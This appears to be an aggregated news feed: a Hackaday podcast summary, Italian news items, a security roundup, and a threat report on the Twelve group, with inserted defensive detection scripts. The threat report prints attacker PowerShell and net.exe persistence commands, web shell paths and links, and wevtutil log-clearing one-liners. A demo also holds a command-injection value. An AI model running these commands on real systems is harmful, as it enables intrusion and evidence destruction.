

Hackaday Podcast Episode 289: Tiny Games, Two Modern Modems, and the Next Big Thing



This week on the Podcast, Hackaday’s Elliot Williams and Kristina Panos joined forces to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.

First up in the news: we’ve announced the 2024 Tiny Games Contest winners! We asked you to show us your best tiny game, whether that means tiny hardware, tiny code, or a tiny BOM, and you did so in spades. Congratulations to all the winners and Honorable Mentions, and thanks to DigiKey, Supplyframe, and all who entered!

We also announced the first round of Supercon speakers, so if you haven’t gotten your ticket yet, now’s the second best time.

But wait, there’s more! We’re already a few weeks into the next contest, where we want you to show us your best Simple Supercon Add-On. We love to see the add-ons people make for the badge every year, so this time around we’re really embracing the standard. The best SAOs will get a production run and they’ll be in the swag bag at Hackaday Europe 2025.

Then it’s on to What’s That Sound, which completely stumped Kristina once again. Can you get it? Can you figure it out? Can you guess what’s making that sound? If you can, and your number comes up, you get a special Hackaday Podcast t-shirt.

Now it’s on to the hacks, beginning with non-planar ironing for smooth prints, and a really neat business card that also plays tiny games. Then we’ll discuss USB modems, cool casts for broken wrists, and archiving data on paper. Finally, we ask two big questions — where do you connect the shield, and what’s the Next Big Thing gonna be? Inquiring minds want to know.

Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!


Download in DRM-free MP3 and savor at your leisure.

Where to Follow Hackaday Podcast




Episode 289 Show Notes:

News:



What’s that Sound?



Interesting Hacks of the Week:



Quick Hacks:



Can’t-Miss Articles:



hackaday.com/2024/09/20/hackad…



Mobbing and stress-inducing workplaces: the PD is considering an amendment to extend protection to self-employed workers


@Domestic, European and international politics
The InOltre Alternativa Progressista association proposes working on a joint opposition amendment to Law 81/2017, with the aim of extending the protection provided by Article 2087



Inviting the Public to Take Stereo Photos for Science



[Lynnadeng]’s team wanted to monitor the Los Angeles River over time and wanted citizen scientists — or anyone, for that matter — to help. They built a dual phone holder to allow random passersby to use their phones to take photos. A QR code lets them easily send the pictures to the team. The 3D printed holder is fixed in place and has a known gap that allows stereo reconstruction from pairs of photos.

Of course, people aren’t going to know what to do, so you need a sign with instructions along with the QR code. One advantage to this scheme is that it’s cheap. All the camera hardware is in the public’s phone. Of course, you still have to make the holder robust to the elements, but that’s not nearly as difficult as supplying power and weatherproofing cameras and radios.

The really interesting part is the software. At first, we were disappointed that the post had a dead link to GitHub, but it was easy enough to find the correct one. In some cases, people will use a single camera, so 3D reconstruction isn’t always possible.

We love citizen science around here. No matter where you live, there are many opportunities to contribute.


hackaday.com/2024/09/20/inviti…



Minister Pichetto Fratin: “We want to bring nuclear power back to Italy”


@Domestic, European and international politics
Environment and Energy Security Minister Gilberto Pichetto Fratin wants to bring nuclear energy back to Italy. The minister has announced the upcoming launch of a bill to relaunch the sector through new-generation small modular reactors. Pichetto



New Attacks on Linux SSH Servers: Supershell Malware Compromises Vulnerable Systems


ASEC researchers have identified new attacks against poorly protected Linux SSH servers. In them, the attackers used the Supershell malware, written in Go. This backdoor gives the attackers remote control over compromised systems.

After the initial infection, the attackers launch scanners to look for further vulnerable targets. These attacks are believed to be carried out with password dictionaries obtained from servers that were already infected.

The attackers use the wget, curl, tftp and ftpget commands to download and run malicious scripts. These scripts give them full access to the system and install additional malware, then hide the traces of the attack by deleting the downloaded files.

Once a backdoor is in place, the attackers can deploy hidden cryptocurrency miners such as XMRig on infected hosts, a typical attack pattern on vulnerable Linux servers. In the campaign under examination the attackers also used Cobalt Strike to set up remote access and ElfMiner to install crypto miners.

Experts recommend that administrators harden their systems, update software regularly, use strong passwords and enable firewalls to minimize the risk of infection.

The article New Attacks on Linux SSH Servers: Supershell Malware Compromises Vulnerable Systems originally appeared on il blog della sicurezza informatica.
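
The dictionary attack described above leaves a recognisable trail in sshd’s syslog output: a burst of “Failed password” lines from one source, sometimes followed by an “Accepted password” from the same source. The script below is an added example (not code from the ASEC report or from this article) that finds that pattern in auth.log lines and checks an sshd_config for the settings that leave password guessing open. The log lines in SAMPLE_AUTH_LOG are constructed to look like OpenSSH output; the failure threshold and the config checks are the editor’s assumptions.

```python
"""Triage sshd syslog lines for SSH password guessing (added example).

The log lines are constructed; the threshold is an assumption.
"""
import re
from collections import defaultdict

# OpenSSH message formats for password logins (host/pid prefix ignored)
FAILED_RE = re.compile(
    r"Failed password for (?:invalid user )?(\S+) from (\d+\.\d+\.\d+\.\d+) port \d+")
ACCEPTED_RE = re.compile(
    r"Accepted password for (\S+) from (\d+\.\d+\.\d+\.\d+) port \d+")

SAMPLE_AUTH_LOG = """\
Sep 20 10:01:02 web1 sshd[1200]: Failed password for invalid user admin from 203.0.113.7 port 51312 ssh2
Sep 20 10:01:03 web1 sshd[1201]: Failed password for invalid user oracle from 203.0.113.7 port 51320 ssh2
Sep 20 10:01:04 web1 sshd[1202]: Failed password for root from 203.0.113.7 port 51331 ssh2
Sep 20 10:01:05 web1 sshd[1203]: Failed password for root from 203.0.113.7 port 51340 ssh2
Sep 20 10:01:06 web1 sshd[1204]: Failed password for root from 203.0.113.7 port 51355 ssh2
Sep 20 10:01:07 web1 sshd[1205]: Failed password for root from 203.0.113.7 port 51362 ssh2
Sep 20 10:01:09 web1 sshd[1206]: Accepted password for root from 203.0.113.7 port 51399 ssh2
Sep 20 10:03:00 web1 sshd[1220]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Sep 20 10:03:10 web1 sshd[1221]: Accepted publickey for alice from 198.51.100.4 port 40001 ssh2: RSA SHA256:AAAA
"""


def find_password_guessing(lines, threshold=5):
    """One finding per source IP with at least `threshold` failed password
    logins. `accepted_as` is set when a password login from the same source
    later succeeded, i.e. the guessing probably landed."""
    failures = defaultdict(int)
    usernames = defaultdict(set)
    accepted_as = {}
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            failures[ip] += 1
            usernames[ip].add(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m.group(2)] >= threshold:
            accepted_as[m.group(2)] = m.group(1)
    return [
        {"ip": ip, "failures": n, "usernames_tried": sorted(usernames[ip]),
         "accepted_as": accepted_as.get(ip)}
        for ip, n in sorted(failures.items()) if n >= threshold
    ]


def weak_sshd_settings(config_text):
    """Flag sshd_config directives that keep password guessing viable.
    A missing PasswordAuthentication counts as weak: OpenSSH defaults it to yes."""
    settings = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            key, _, value = line.partition(" ")
            settings[key.lower()] = value.strip().lower()
    weak = []
    if settings.get("passwordauthentication", "yes") == "yes":
        weak.append("PasswordAuthentication yes (use keys; set to no)")
    if settings.get("permitrootlogin") == "yes":
        weak.append("PermitRootLogin yes (set to no or prohibit-password)")
    if settings.get("permitemptypasswords") == "yes":
        weak.append("PermitEmptyPasswords yes")
    return weak


if __name__ == "__main__":
    for finding in find_password_guessing(SAMPLE_AUTH_LOG.splitlines()):
        print(finding)
    print(weak_sshd_settings("PermitRootLogin yes\nPasswordAuthentication yes\n"))
```

On the constructed log the only finding is 203.0.113.7: six failures across three usernames, then an accepted root login, which is the case worth paging on. The single typo from 198.51.100.4 followed by a key-based login stays below the threshold.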



This is Behind the Blog, where we share our behind-the-scenes thoughts about how a few of our top stories of the week came together. This week, we discuss good dogs, good games, getting documents and netsex. #BehindTheBlog


This Week in Security: Open Source C2, Raptor Trains, and End to End Encryption



Open Source has sort of eaten everything in software these days. And that includes malware, apparently, with open source Command and Control (C2) frameworks like Sliver and Havoc gaining traction. And of course, this oddball intersection of Open Source and security has intrigued at least one security researcher who has found some interesting vulnerabilities.

Before we dive into what was found, you may wonder why open source malware tools exist. First off, trustworthy C2 servers are quite useful for researchers, who need access to such tools for testing. Then there is Red Teaming, where a security professional launches a mock attack against a target to test its defenses. A C2 is often useful for education and hobby level work, and then there are the true criminals that do use these Open Source tools. It takes all types.

A C2 system consists of an agent installed on compromised systems, usually aiming for stealth. These agents connect to a central server, sending information and then executing any instructions given. And finally there’s a client, which is often just a web interface or even a command line interface.

Now what sort of fun is possible in these C2 systems? Up first is Sliver, written in Go, with a retro command line interface. Sliver supports launching Metasploit on compromised hosts. Turns out, it accidentally supported running Metasploit modules against the server’s OS itself, leading to an easy remote shell from an authenticated controller account.

Havoc has a fancy user interface for the clients, and also a command injection flaw. A service name field gets used to generate a shell command, so you’re only a simple escape away from running commands. That’s not quite as useful as the API that failed open when a bad username/password was given. Oops.
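
Both of the Havoc bug classes above are easy to reproduce in miniature. The snippet below is an added illustration, not Sliver’s or Havoc’s code: an operator-supplied service name spliced into a shell command (vulnerable, then allow-listed and passed as argv, then quoted for the case where a shell string is unavoidable), and an API check that only denies on an explicit False, so a backend error falls through to “granted”. The function names register_service_* and authorize_* are hypothetical, and the one-user table is constructed.

```python
"""Command injection and fail-open authentication, vulnerable beside hardened
(added example; names and the user table are constructed)."""
import hashlib
import hmac
import re
import shlex

SERVICE_NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")


def register_service_vulnerable(service_name):
    """Builds the string the server would hand to a shell. Anything after a
    ';', '&&' or '|' in the name becomes a second command."""
    return f"systemctl status {service_name}"


def register_service_hardened(service_name):
    """Allow-list the field, then return argv so no shell ever parses it."""
    if not SERVICE_NAME_RE.fullmatch(service_name):
        raise ValueError(f"invalid service name: {service_name!r}")
    return ["systemctl", "status", service_name]


def register_service_quoted(service_name):
    """If a shell string is unavoidable, quote the field: the payload then
    arrives as one literal argument instead of a new command."""
    return f"systemctl status {shlex.quote(service_name)}"


_SALT = b"constructed-salt"
USERS = {"operator": hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, 100_000)}


def verify_password(username, password):
    """True/False for a known user; raises KeyError for an unknown one,
    standing in for any backend error (DB down, malformed record...)."""
    expected = USERS[username]
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)
    return hmac.compare_digest(digest, expected)


def authorize_fail_open(username, password):
    """The bug: only an explicit False denies, so an error (None) grants."""
    try:
        ok = verify_password(username, password)
    except Exception:
        ok = None
    if ok is False:
        return "denied"
    return "granted"


def authorize_fail_closed(username, password):
    """Deny unless verification positively succeeded."""
    try:
        return "granted" if verify_password(username, password) is True else "denied"
    except Exception:
        return "denied"


if __name__ == "__main__":
    print(register_service_vulnerable("agent; id"))
    print(shlex.split(register_service_quoted("agent; id")))
    print(authorize_fail_open("nobody", "x"), authorize_fail_closed("nobody", "x"))
```

The argv form is the one to prefer: once the name never reaches a shell, quoting mistakes stop mattering. For the authentication case the shape to look for in review is any `if result is False` or `if result == False` on a call that can also return None or raise.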

Trains!


[Bertin Jose] has a bit of a side hobby of scanning the Internet for interesting endpoints, with an emphasis on industrial control systems. In an automated scan, a CZAT7 device popped up — a traction power substation controller. This is a miniature power station that supplies power to electric railways. And this one was not only connected to the Internet, it exposed a web interface that probably wasn’t intended to be public. And it included coordinates. It’s delightful that we can point to a picture on Google Maps, to the little building in Poland where this controller lives.

[Bertin] has enough experience with control devices like these to know that 1111 is a common password. It’s wild that both 1111 and 2222 worked for read/write access. This is where there was clearly a line: fiddling around further inside real devices would be ill-advised. What turned out to be more of a problem was finding the right people to disclose the device to. There was never a response, but the device seems to finally be off the Internet.

Raptor Train


We have news this week of a joint effort between Lumen Technologies and the US DoJ to take down Raptor Train, a botnet that lives on a variety of routers, IoT devices, cameras and NVRs. This botnet is interesting in that each device was only compromised for an average of 17 days at a time, with the infection persisting only until the next reboot.

What’s always fun about watching malware activity like this is to line up activity with timezones around the world. This one roughly corresponds to a 10:00 AM to 7:00 PM working day in China Standard Time, which checks out with the likely attribution to the Chinese group, Flax Typhoon. The count of total devices was somewhere around 260,000, with exploitation due to a combination of 0-day and n-day vulnerabilities. Turns out maybe it’s not a great idea to put those cameras on the Internet.

Discord and DAVE


Discord has rolled out DAVE, Discord Audio and Video end-to-end Encryption. This new solution will provide encryption for voice and video for DMs, Group DMs, and other live calls on Discord. The solution is Open Source, and was designed in collaboration with Trail of Bits.

Lots of established cryptography was used, and at a brief look the scheme seems to check out. Notably missing is any mention of quantum-resistant cryptography. That’s not entirely unexpected, as we’re still several years away from practical quantum computers, and the schemes designed to resist quantum attacks are still quite new and immature.

The Other Side of the Coin


In an interesting counterpoint to Discord’s new scheme, Interpol has taken down Ghost, an end-to-end-encrypted communications platform widely used for organized crime. It seems that Ghost was designed and marketed specifically for criminal use, but one has to ask the question about whether Discord will also face repercussions for the move to strong encryption.

Bits and Bytes


The folks at Cyber Security Associates have the scoop on doing a Patch Diff on a vulnerability fixed in a recent Windows Patch Tuesday. The short explanation is that incoming calls to the driver weren’t checked for whether they originated in the kernel or in userspace.

And finally, there’s a real mystery on the Internet. GreyNoise describes Noise Storms of spoofed packets flooding the Internet. These seem to be malicious, coming in waves since January 2020. The inclusion of the string LOVE in recent packets suggests the name LOVE Storm. GreyNoise has made packet captures available, if any of our readers feel like joining in on the sleuthing to figure out what these packets are up to.


hackaday.com/2024/09/20/this-w…



Healthcare and the cyber emergency. Frattasi (ACN): “AI to help defend the sector from attacks”


@IT (Italy and non-Italy 😁)
The awareness campaign for healthcare facilities on cybersecurity starts in Lazio, with operational guidelines specific to the healthcare sector drawn up by the National Cybersecurity Agency. The project



Ukrainian lessons for the Pentagon. Here is the new drone unit

@News from Italy and the world

In the forests of Louisiana, the US Army is testing the effectiveness of a new type of unit set up on the basis of lessons learned from the conflict in Ukraine. During the wargame organized last August by the US Army’s Joint Readiness Training Center, the new platoon of



«Draghi looks to the past. Financing companies does not change development»


@News from Italy and the world
The new article by @valori@poliversity.it
Interview with the economist Mario Pianta on the many shadows of the European plan presented by Mario Draghi
The article «Draghi looks to the past. Financing companies does not change development» originally appeared on Valori.

valori.it/mario-pianta-piano-d…



The pregnancy mystery and that violent quarrel: what emerges from the Sangiuliano-Boccia chats


@Domestic, European and international politics
Violent quarrels, threats, an alleged pregnancy and confidentiality agreements never signed. A stormy relationship, to say the least, between former Culture Minister Gennaro Sangiuliano and the entrepreneur Maria Rosaria Boccia, at least according to what is reported in the complaint



Healthcare: ACN presents its threat report. Director General Frattasi: “AI to help defend the sector from attacks”


@IT (Italy and non-Italy 😁)
The awareness campaign for healthcare facilities on cybersecurity starts in Lazio, with operational guidelines specific to the healthcare sector drawn up by the Agency for



-=TWELVE=- is back



In the spring of 2024, posts with real people’s personal data began appearing on the -=TWELVE=- Telegram channel. Soon it was blocked for falling foul of the Telegram terms of service. The group stayed off the radar for several months, but as we investigated a late June 2024 attack, we found that it employed techniques identical to those of Twelve and relied on C2 servers linked to the threat actor. We are therefore confident that the group is still active and will probably soon resurface. This article uses the Unified Kill Chain methodology to analyze the attackers’ actions.

About Twelve


The group was formed in April 2023 in the context of the Russian-Ukrainian conflict and has attacked Russian government organizations ever since.

The threat actor specializes in encrypting and then deleting victims’ data, which seriously complicates efforts to recover the IT environment. This suggests that their main goal is inflicting as much damage as possible. When attacking, the group aims to reach critical infrastructure, but they do not always succeed. In addition, Twelve exfiltrates sensitive information from its victims’ systems and posts it on its Telegram channel.

Interestingly, Twelve shares infrastructure, utilities and techniques (TTPs) with the DARKSTAR ransomware group, formerly known as Shadow or COMET, which suggests that the two belong to the same syndicate or activity cluster. At the same time, whereas Twelve’s actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern. This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats.

Unified Kill Chain: In


The In stage in terms of the Unified Kill Chain refers to the initial phases of a cyberattack aimed at gaining access to the target organization’s LAN. These phases include a range of tactical actions: from external reconnaissance to assuming control of the systems inside the protected network.

Reconnaissance


While we do not know the exact reconnaissance techniques the threat actor uses, we suspect that they scan IP address ranges across Russia based on geotags and try to identify VPN servers and applications accessible from the internet that could be used as entry points into a target organization’s or a contractor’s infrastructure.

Resource Development


As we analyzed the cyberattacks, we found that the threat actor relied exclusively on well-known and freely available tools. The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.

Initial Access and Delivery


In most of the attacks we are aware of, the adversary gained initial access to victims’ infrastructure through valid local or domain accounts, VPN or SSH certificates. After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.

In most cases, the attackers penetrated the target infrastructure through one of the victim’s contractors: they first gained access to the contractor’s infrastructure and then used its certificate to connect to the customer’s VPN. From there, the adversary could connect to the customer’s systems via RDP and move deeper into the customer’s infrastructure.


Exploitation
Web shells


As we analyzed the web servers compromised by the attackers, we discovered a large number of web shells. The paths where these were found looked as follows.
/home/bitrix/ext_www/[REDACTED]/assets/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/admin/
All the web shells were written in PHP and bore random names:
F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,
a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,
82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php
They could serve various purposes: some executed arbitrary commands, others moved files, and still others, created and sent email. Below are two examples of single-line web shells for moving files.

Examples of web shells for moving files

It is worth noting that most of the web shells used by the threat actor are publicly available tools. Here are two examples:

  • https://github[.]com/stefanpejcic/wordpress-malware;
  • https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.

We use the example of a remailer (script for sending email) to examine how the web shells function.

Example of a remailer script used by the threat actor

The attackers used this PHP script to send email messages. It starts by checking that the required data (recipient address, subject and message body) is present in the POST request. If any of these is missing, the script reports an error and quits. After checking and preparing the email components, it uses the PHP mail() function to send the email.
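
Two of the traits described above are cheap to hunt for on a web server: PHP files with random hex names sitting in image or asset directories, and scripts that feed request data straight into file, shell or mail functions (as the remailer does with mail()). The script below is an added example, not Kaspersky’s tooling; it builds a small constructed document root in a temporary directory and walks it, and the name and function heuristics are the editor’s.

```python
"""Hunt for PHP web shells by filename, location and dangerous-call patterns
(added example; the sample tree is constructed, the heuristics are the editor's)."""
import os
import re
import tempfile

RANDOM_NAME_RE = re.compile(r"^[0-9a-fA-F]{6,10}\.php$")
ASSET_DIR_HINTS = {"images", "assets", "upload", "uploads", "ajax"}
# functions a web shell typically calls with attacker-controlled input
DANGEROUS_RE = re.compile(
    r"\b(eval|system|shell_exec|passthru|exec|popen|proc_open|assert|"
    r"rename|move_uploaded_file|file_put_contents|unlink|copy|mail)\s*\(", re.I)
REQUEST_RE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE|FILES)\b")


def inspect_php(rel_path, source):
    """Return the reasons a PHP file looks like a web shell (empty if none)."""
    reasons = []
    name = os.path.basename(rel_path)
    dirs = {p.lower() for p in os.path.dirname(rel_path).split(os.sep)}
    if RANDOM_NAME_RE.match(name):
        reasons.append("random-hex-filename")
    if dirs & ASSET_DIR_HINTS:
        reasons.append("php-in-asset-dir")
    calls = sorted({m.group(1).lower() for m in DANGEROUS_RE.finditer(source)})
    if calls and REQUEST_RE.search(source):
        reasons.append("request-data-into:" + ",".join(calls))
    return reasons


def hunt(root):
    """Walk `root`; return {relative path: [reasons]} for flagged .php files."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root)
            with open(full, encoding="utf-8", errors="replace") as fh:
                reasons = inspect_php(rel, fh.read())
            if reasons:
                findings[rel] = reasons
    return findings


def build_sample_tree(root):
    """Constructed docroot: a file-moving shell, a remailer and a clean admin page."""
    files = {
        os.path.join("assets", "images", "F6d098f417.php"):
            "<?php rename($_POST['src'], $_POST['dst']); ?>",
        os.path.join("bitrix", "admin", "001d7a.php"):
            "<?php if(!isset($_POST['to'],$_POST['s'],$_POST['b'])){die('err');}"
            "mail($_POST['to'],$_POST['s'],$_POST['b']); ?>",
        os.path.join("bitrix", "admin", "index.php"):
            "<?php echo 'Admin'; ?>",
    }
    for rel, body in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def run_sample():
    """Build the constructed tree in a temp dir, hunt it, and return the
    findings keyed by forward-slash relative path."""
    with tempfile.TemporaryDirectory() as tmp:
        found = hunt(build_sample_tree(tmp))
    return {k.replace(os.sep, "/"): v for k, v in found.items()}


if __name__ == "__main__":
    for path, why in run_sample().items():
        print(path, why)
```

Run it against a real document root with hunt("/home/bitrix/ext_www/site") and review the hits by hand: the name and location heuristics alone produce false positives on some CMS installs, so the combination with a request-to-dangerous-call match is what makes a hit worth opening.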

FaceFish backdoor


An incident we investigated involved the FaceFish backdoor, loaded with the help of a web shell installed on a VMware vCenter server by exploiting CVE-2021-21972 and CVE-2021-22005 in the vSphere virtualization platform. The former is a remote code execution vulnerability in the vSphere Client, while the latter is an arbitrary file upload vulnerability in vCenter Server.

Like most of the web shells used by the group, this one is publicly available.
https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux
It was located at the following path in the infected system:
/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp
Once started, FaceFish saves a libs.so shared library on the system, injects it into the sshd process via /etc/ld.so.preload and restarts the SSH service.

Example of FaceFish output
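
The ld.so.preload trick leaves two host artifacts: an entry in /etc/ld.so.preload, and a shared object mapped into sshd from a directory where no library belongs. The checks below are an added example, not FaceFish analysis code; the preload file and /proc/<pid>/maps text are constructed, and the list of expected library directories is an assumption to adjust per distribution.

```python
"""Spot an ld.so.preload hijack of sshd (added example; samples are constructed,
EXPECTED_LIB_DIRS is an assumption)."""
import os

EXPECTED_LIB_DIRS = ("/lib/", "/lib64/", "/lib32/", "/usr/lib/", "/usr/lib64/",
                     "/usr/lib32/", "/usr/libexec/", "/usr/local/lib/")

SAMPLE_PRELOAD = "/var/tmp/.x/libs.so\n"   # constructed; the real drop path is not on the page
SAMPLE_MAPS = """\
55d0c1e00000-55d0c1e3f000 r--p 00000000 fd:01 1310725 /usr/sbin/sshd
7f3a0a200000-7f3a0a222000 r--p 00000000 fd:01 3932167 /usr/lib/x86_64-linux-gnu/libc.so.6
7f3a0a400000-7f3a0a403000 r-xp 00000000 fd:01 2228224 /var/tmp/.x/libs.so
7f3a0a600000-7f3a0a621000 rw-p 00000000 00:00 0 [heap]
7f3a0a800000-7f3a0a802000 r-xp 00000000 fd:01 3932200 /usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
"""


def preload_entries(text):
    """/etc/ld.so.preload holds one library path per line. On a clean host it is
    normally absent or empty, so every entry deserves a look."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")]


def unexpected_mapped_libs(maps_text):
    """Shared objects mapped from outside the expected library directories.
    /proc/<pid>/maps columns: address perms offset dev inode pathname."""
    seen, out = set(), []
    for line in maps_text.splitlines():
        cols = line.split(maxsplit=5)
        if len(cols) < 6:
            continue
        path = cols[5]
        if path.endswith(" (deleted)"):        # unlinked after load: still mapped
            path = path[:-len(" (deleted)")]
        if not path.startswith("/") or path in seen:
            continue
        seen.add(path)
        is_lib = path.endswith(".so") or ".so." in path
        if is_lib and not path.startswith(EXPECTED_LIB_DIRS):
            out.append(path)
    return out


def sshd_pids():
    """PIDs whose /proc/<pid>/comm is sshd (empty list on non-Linux hosts)."""
    pids = []
    for entry in (os.listdir("/proc") if os.path.isdir("/proc") else []):
        if entry.isdigit():
            try:
                with open(f"/proc/{entry}/comm") as fh:
                    if fh.read().strip() == "sshd":
                        pids.append(int(entry))
            except OSError:
                continue
    return pids


def audit_live():
    """Run both checks against the running host."""
    report = {"preload": [], "sshd": {}}
    if os.path.exists("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as fh:
            report["preload"] = preload_entries(fh.read())
    for pid in sshd_pids():
        try:
            with open(f"/proc/{pid}/maps") as fh:
                report["sshd"][pid] = unexpected_mapped_libs(fh.read())
        except OSError:
            continue
    return report


if __name__ == "__main__":
    print(preload_entries(SAMPLE_PRELOAD))
    print(unexpected_mapped_libs(SAMPLE_MAPS))
    print(audit_live())
```

Run audit_live() as root so /proc/<pid>/maps of sshd is readable. A library reported from /var/tmp, /dev/shm or a home directory, or one marked deleted, is the signal; compare any preload entry against the package manager before trusting it.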

Persistence


To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects. Below is a list of the PowerShell commands they ran.
Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'
Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'
Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds"
Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
The attackers also added domain accounts and user groups with the net.exe system utility.
net user [REDACTED] engineers /domain /add
net group [REDACTED] engineers /domain /add
net group engineers [REDACTED] /domain /add
net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group engineers /domain
net group users /domain
net group "Domain Administrators" [REDACTED] /add /domain
Furthermore, they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain.
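
Every change listed above lands in the Security log of a domain controller: 4720 for a new account, 4728/4732/4756 for a member added to a global, local or universal group, and 5136 for a modified directory object, which is where an Add-DomainObjectAcl write (attribute nTSecurityDescriptor) or a Set-DomainObject SPN write shows up. The triage below is an added example, not Kaspersky’s detection logic; the records in SAMPLE_EVENTS are constructed dicts using the real events’ field names, and the privileged-group list is the editor’s starting point.

```python
"""Flag account creation, privileged-group membership changes and ACL/SPN writes
in Security events (added example; events are constructed)."""

PRIVILEGED_GROUPS = {
    "domain admins", "enterprise admins", "schema admins", "administrators",
    "account operators", "backup operators", "dnsadmins",
    "exchange windows permissions", "organization management",
}
MEMBER_ADDED = {"4728", "4732", "4756"}   # global, local, universal group

SAMPLE_EVENTS = [  # constructed
    {"EventID": "4720", "SubjectUserName": "jdoe", "TargetUserName": "svc_eng"},
    {"EventID": "4728", "SubjectUserName": "jdoe", "TargetUserName": "engineers",
     "MemberName": "CN=svc_eng,CN=Users,DC=corp,DC=example"},
    {"EventID": "4728", "SubjectUserName": "jdoe", "TargetUserName": "Exchange Windows Permissions",
     "MemberName": "CN=engineers,CN=Users,DC=corp,DC=example"},
    {"EventID": "5136", "SubjectUserName": "svc_eng",
     "ObjectDN": "CN=DC1,OU=Domain Controllers,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": "5136", "SubjectUserName": "svc_eng",
     "ObjectDN": "CN=backupadmin,CN=Users,DC=corp,DC=example",
     "AttributeLDAPDisplayName": "servicePrincipalName"},
    {"EventID": "4728", "SubjectUserName": "hr-admin", "TargetUserName": "HR Staff",
     "MemberName": "CN=newhire,CN=Users,DC=corp,DC=example"},
]


def _cn(dn):
    """Value of the first RDN of a distinguished name ('CN=x,...' -> 'x')."""
    return dn.split(",", 1)[0].split("=", 1)[-1]


def effective_privileged_groups(events):
    """Known privileged groups plus any principal nested into one of them during
    the batch. Iterates until stable so A -> B -> Domain Admins is caught
    whatever the event order."""
    privileged = {g.lower() for g in PRIVILEGED_GROUPS}
    changed = True
    while changed:
        changed = False
        for e in events:
            if e["EventID"] in MEMBER_ADDED and e["TargetUserName"].lower() in privileged:
                member = _cn(e["MemberName"]).lower()
                if member not in privileged:
                    privileged.add(member)
                    changed = True
    return privileged


def triage_directory_events(events):
    """Return findings as dicts, in event order."""
    findings = []
    new_accounts = {e["TargetUserName"].lower() for e in events if e["EventID"] == "4720"}
    privileged = effective_privileged_groups(events)
    for e in events:
        eid, actor = e["EventID"], e["SubjectUserName"]
        if eid == "4720":
            findings.append({"severity": "low", "rule": "account-created",
                             "detail": e["TargetUserName"], "by": actor})
        elif eid in MEMBER_ADDED:
            group = e["TargetUserName"].lower()
            member = _cn(e["MemberName"]).lower()
            if group in privileged:
                findings.append({"severity": "high", "rule": "member-added-to-privileged-group",
                                 "detail": f"{member} -> {group}", "by": actor})
            elif member in new_accounts:
                findings.append({"severity": "medium", "rule": "new-account-added-to-group",
                                 "detail": f"{member} -> {group}", "by": actor})
        elif eid == "5136":
            rule = {"nTSecurityDescriptor": "acl-modified",
                    "servicePrincipalName": "spn-written"}.get(e["AttributeLDAPDisplayName"])
            if rule:
                findings.append({"severity": "high", "rule": rule,
                                 "detail": e["ObjectDN"], "by": actor})
    return findings


if __name__ == "__main__":
    for f in triage_directory_events(SAMPLE_EVENTS):
        print(f)
```

Note the nesting step: in the sample, svc_eng joining “engineers” looks harmless until “engineers” is itself added to Exchange Windows Permissions, which is exactly the chain the net group commands above build. 5136 only fires if SACL auditing for directory service changes is enabled on the objects concerned, so check that first.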

Defense Evasion


To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services.
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
They also used a range of techniques to hide the traces of their activity. In particular, they cleared event logs with the wevtutil.exe system utility in various command shell variants.
powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}

C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1
